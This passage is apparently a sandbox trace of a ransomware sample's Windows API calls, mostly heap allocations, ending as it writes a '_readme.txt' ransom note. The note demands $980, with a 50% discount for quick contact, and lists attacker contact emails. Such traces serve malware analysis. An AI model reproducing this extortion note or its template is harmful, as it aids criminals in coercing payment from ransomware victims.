Flags=0x0, Size=0x820) returned 0x3b15070 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b65058 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0200.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f91d8 | out: hHeap=0x2c0000) returned 1 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0200.739] PathFindFileNameW (pszPath="C:\\Boot\\de-DE\\") returned="de-DE\\" [0200.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.739] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0200.739] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0200.739] PathFindFileNameW (pszPath="") returned="" [0200.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9188 [0200.739] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0200.739] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0200.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0200.739] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0200.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0200.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f91d8 [0200.739] FreeLibrary (hLibModule=0x75020000) returned 1 [0200.739] PathAppendW (in: pszPath="C:\\Boot\\de-DE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 1 [0200.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0200.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9110 | out: hHeap=0x2c0000) returned 1 [0200.739] PathFileExistsW (pszPath="C:\\Boot\\de-DE\\_readme.txt") returned 0 [0200.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0200.741] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0200.741] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your 